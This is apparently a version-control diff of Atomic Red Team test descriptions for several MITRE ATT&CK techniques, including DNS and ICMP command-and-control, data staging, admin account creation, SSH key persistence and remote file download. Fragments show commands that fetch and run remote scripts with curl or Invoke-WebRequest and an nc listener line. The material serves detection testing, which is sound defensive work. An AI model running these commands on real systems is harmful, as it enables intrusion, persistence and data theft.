Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
#### Inputs:
atomics/T1071.004/T1071.004.md
+20 -12
View File
@@ -18,15 +18,17 @@ The DNS protocol serves an administrative function in computer networking and th
<br/>
## Atomic Test #1 - DNS Large Query Volume
auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6
#### Inputs:
@@ -54,15 +56,17 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
<br/>
## Atomic Test #2 - DNS Regular Beaconing
auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
#### Inputs:
@@ -93,15 +97,17 @@ Set-Location PathToAtomicsFolder
<br/>
## Atomic Test #3 - DNS Long Domain Query
auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978
#### Inputs:
@@ -129,18 +135,20 @@ Set-Location PathToAtomicsFolder
<br/>
## Atomic Test #4 - DNS C2
auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7
#### Inputs:
atomics/T1072/T1072.md
+5 -3
View File
@@ -14,13 +14,15 @@ The permissions required for this action vary by system configuration; local cre
<br/>
## Atomic Test #1 - Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
**Supported Platforms:** Windows
**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129
#### Inputs:
atomics/T1074.001/T1074.001.md
+15 -9
View File
@@ -14,14 +14,16 @@
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f
#### Inputs:
@@ -50,13 +52,15 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
<br/>
## Atomic Test #2 - Stage data from Discovery.sh
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
Utilize curl to download discovery.sh and execute a basic information gathering shell script
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066
#### Inputs:
@@ -81,14 +85,16 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a
#### Inputs:
atomics/T1078.001/T1078.001.md
+5 -3
View File
@@ -12,14 +12,16 @@ Default accounts are not limited to client machines, rather also include account
<br/>
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
**Supported Platforms:** Windows
**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
#### Inputs:
atomics/T1078.003/T1078.003.md
+5 -3
View File
@@ -12,13 +12,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
<br/>
## Atomic Test #1 - Create local account with admin priviliges
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
After execution the new account will be active and added to the Administrators group
**Supported Platforms:** Windows
**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15
atomics/T1082/T1082.md
+55 -33
View File
@@ -34,13 +34,15 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
<br/>
## Atomic Test #1 - System Information Discovery
auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667
Identify System Info. Upon execution, system info and time info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667
@@ -61,13 +63,15 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
<br/>
## Atomic Test #2 - System Information Discovery
auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
Identify System Info
**Supported Platforms:** macOS
**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6
@@ -88,13 +92,15 @@ ls -al /Applications
<br/>
## Atomic Test #3 - List OS Information
auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
Identify System Info
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
#### Inputs:
@@ -128,13 +134,15 @@ rm #{output_file} 2>/dev/null
<br/>
## Atomic Test #4 - Linux VM Check via Hardware
auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec
@@ -161,13 +169,15 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
<br/>
## Atomic Test #5 - Linux VM Check via Kernel Modules
auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e
@@ -191,13 +201,15 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
<br/>
## Atomic Test #6 - Hostname Discovery (Windows)
auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f
@@ -217,13 +229,15 @@ hostname
<br/>
## Atomic Test #7 - Hostname Discovery
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
Identify system hostname for Linux and macOS systems.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
@@ -243,13 +257,15 @@ hostname
<br/>
## Atomic Test #8 - Windows MachineGUID Discovery
auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8
@@ -269,16 +285,18 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
<br/>
## Atomic Test #9 - Griffon Recon
auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool.
This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d),
and it gives the exact same recon behavior as the original (minus the C2 interaction).
For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/
**Supported Platforms:** Windows
**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370
#### Inputs:
@@ -303,13 +321,15 @@ cscript #{vbscript}
<br/>
## Atomic Test #10 - Environment variables discovery on windows
auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
@@ -329,13 +349,15 @@ set
<br/>
## Atomic Test #11 - Environment variables discovery on macos and linux
auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
atomics/T1083/T1083.md
+20 -12
View File
@@ -18,14 +18,16 @@ Many command shell utilities can be used to obtain this information. Examples in
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6
@@ -51,13 +53,15 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924
@@ -79,9 +83,6 @@ gci -recurse
<br/>
## Atomic Test #3 - Nix File and Diectory Discovery
auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de
Find or discover files on the file system
References:
@@ -89,9 +90,14 @@ References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
#### Inputs:
@@ -127,13 +133,15 @@ rm #{output_file}
<br/>
## Atomic Test #4 - Nix File and Directory Discovery 2
auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
Find or discover files on the file system
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
#### Inputs:
atomics/T1087.001/T1087.001.md
+55 -33
View File
@@ -32,13 +32,15 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
<br/>
## Atomic Test #1 - Enumerate all accounts (Local)
auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Linux
**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
#### Inputs:
@@ -68,13 +70,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #2 - View sudoers access
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
(requires root)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
#### Inputs:
@@ -104,13 +108,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #3 - View accounts with UID 0
auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
View accounts with UID 0
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
#### Inputs:
@@ -140,13 +146,15 @@ rm -f #{output_file} 2>/dev/null
<br/>
## Atomic Test #4 - List opened files by user
auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
List opened files by user
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
@@ -166,13 +174,15 @@ username=$(id -u -n) && lsof -u $username
<br/>
## Atomic Test #5 - Show if a user account has ever logged in remotely
auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
Show if a user account has ever logged in remotely
**Supported Platforms:** Linux
**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110
#### Inputs:
@@ -214,13 +224,15 @@ echo "Install lastlog on the machine to run the test."; exit 1;
<br/>
## Atomic Test #6 - Enumerate users and groups
auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
@@ -241,13 +253,15 @@ id
<br/>
## Atomic Test #7 - Enumerate users and groups
auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2
@@ -271,14 +285,16 @@ dscacheutil -q user
<br/>
## Atomic Test #8 - Enumerate all accounts on Windows (Local)
auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
**Supported Platforms:** Windows
**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
@@ -302,13 +318,15 @@ net localgroup
<br/>
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local)
auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
@@ -336,13 +354,15 @@ net localgroup
<br/>
## Atomic Test #10 - Enumerate logged on users via CMD (Local)
auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3
@@ -362,13 +382,15 @@ query user
<br/>
## Atomic Test #11 - Enumerate logged on users via PowerShell
auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03
Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03
atomics/T1087.002/T1087.002.md
+50 -30
View File
@@ -30,14 +30,16 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
<br/>
## Atomic Test #1 - Enumerate all accounts (Domain)
auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
**Supported Platforms:** Windows
**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
@@ -58,13 +60,15 @@ net group /domain
<br/>
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)
auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2
@@ -86,13 +90,15 @@ get-aduser -filter *
<br/>
## Atomic Test #3 - Enumerate logged on users via CMD (Domain)
auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7
#### Inputs:
@@ -117,14 +123,16 @@ query user /SERVER:#{computer_name}
<br/>
## Atomic Test #4 - Automated AD Recon (ADRecon)
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59
#### Inputs:
@@ -166,14 +174,16 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
<br/>
## Atomic Test #5 - Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
**Supported Platforms:** Windows
**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600
#### Inputs:
@@ -210,14 +220,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
**Supported Platforms:** Windows
**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a
#### Inputs:
@@ -254,14 +266,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
#### Inputs:
@@ -298,14 +312,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99
#### Inputs:
@@ -342,13 +358,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)
auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
This test will enumerate the details of the built-in domain admin account
**Supported Platforms:** Windows
**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
@@ -368,16 +386,18 @@ net user administrator /domain
<br/>
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
**Supported Platforms:** Windows
**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b
#### Inputs:
atomics/T1090.001/T1090.001.md
+15 -9
View File
@@ -16,15 +16,17 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
<br/>
## Atomic Test #1 - Connection Proxy
auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd
Enable traffic redirection.
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
#### Inputs:
@@ -55,16 +57,18 @@ unset https_proxy
<br/>
## Atomic Test #2 - Connection Proxy for macOS UI
auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS
**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c
#### Inputs:
@@ -97,15 +101,17 @@ networksetup -setsecurewebproxystate #{interface} off
<br/>
## Atomic Test #3 - portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
Upon execution there will be a new proxy entry in netsh
netsh interface portproxy show all
**Supported Platforms:** Windows
**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a
#### Inputs:
atomics/T1095/T1095.md
+15 -9
View File
@@ -17,14 +17,16 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
<br/>
## Atomic Test #1 - ICMP C2
auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
**Supported Platforms:** Windows
**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc
#### Inputs:
@@ -50,15 +52,17 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
<br/>
## Atomic Test #2 - Netcat C2
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following:
nc -l -p <port>
**Supported Platforms:** Windows
**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
#### Inputs:
@@ -106,15 +110,17 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
<br/>
## Atomic Test #3 - Powercat C2
auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
Start C2 Session Using Powercat
To start the listener on a Linux device, type the following:
nc -l -p <port>
**Supported Platforms:** Windows
**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
#### Inputs:
atomics/T1098.004/T1098.004.md
+5 -3
View File
@@ -12,14 +12,16 @@ Adversaries may modify SSH <code>authorized_keys</code> files directly with scri
<br/>
## Atomic Test #1 - Modify SSH Authorized Keys
auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
atomics/T1098/T1098.md
+10 -6
View File
@@ -12,13 +12,15 @@
<br/>
## Atomic Test #1 - Admin Account Manipulate
auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
Manipulate Admin Account Name
**Supported Platforms:** Windows
**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
@@ -64,9 +66,6 @@ foreach($u in $list) {
<br/>
## Atomic Test #2 - Domain Account and Group Manipulate
auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
@@ -79,9 +78,14 @@ service account whose delegation is given onto a dedicated OU for user creation
as group manager of the target group.
Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
**Supported Platforms:** Windows
**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
#### Inputs:
atomics/T1105/T1105.md
+70 -42
View File
@@ -36,13 +36,15 @@
<br/>
## Atomic Test #1 - rsync remote file copy (push)
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
Utilize rsync to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
#### Inputs:
@@ -70,13 +72,15 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
<br/>
## Atomic Test #2 - rsync remote file copy (pull)
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
#### Inputs:
@@ -104,13 +108,15 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
<br/>
## Atomic Test #3 - scp remote file copy (push)
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
#### Inputs:
@@ -138,13 +144,15 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
<br/>
## Atomic Test #4 - scp remote file copy (pull)
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
#### Inputs:
@@ -172,13 +180,15 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
<br/>
## Atomic Test #5 - sftp remote file copy (push)
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
#### Inputs:
@@ -206,13 +216,15 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
<br/>
## Atomic Test #6 - sftp remote file copy (pull)
auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
#### Inputs:
@@ -240,13 +252,15 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
<br/>
## Atomic Test #7 - certutil download (urlcache)
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
**Supported Platforms:** Windows
**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
#### Inputs:
@@ -276,13 +290,15 @@ del #{local_path} >nul 2>&1
<br/>
## Atomic Test #8 - certutil download (verifyctl)
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
**Supported Platforms:** Windows
**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b
#### Inputs:
@@ -316,14 +332,16 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
<br/>
## Atomic Test #9 - Windows - BITSAdmin BITS Download
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
**Supported Platforms:** Windows
**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
#### Inputs:
@@ -350,14 +368,16 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
<br/>
## Atomic Test #10 - Windows - PowerShell Download
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
This test uses PowerShell to download a payload.
This technique is used by multiple adversaries and malware families.
**Supported Platforms:** Windows
**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
#### Inputs:
@@ -387,13 +407,15 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
<br/>
## Atomic Test #11 - OSTAP Worming Activity
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
**Supported Platforms:** Windows
**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad
#### Inputs:
@@ -423,14 +445,16 @@ popd
<br/>
## Atomic Test #12 - svchost writing a file to a UNC path
auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows
**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f
@@ -456,17 +480,19 @@ del C:\\svchost.exe >nul 2>&1
<br/>
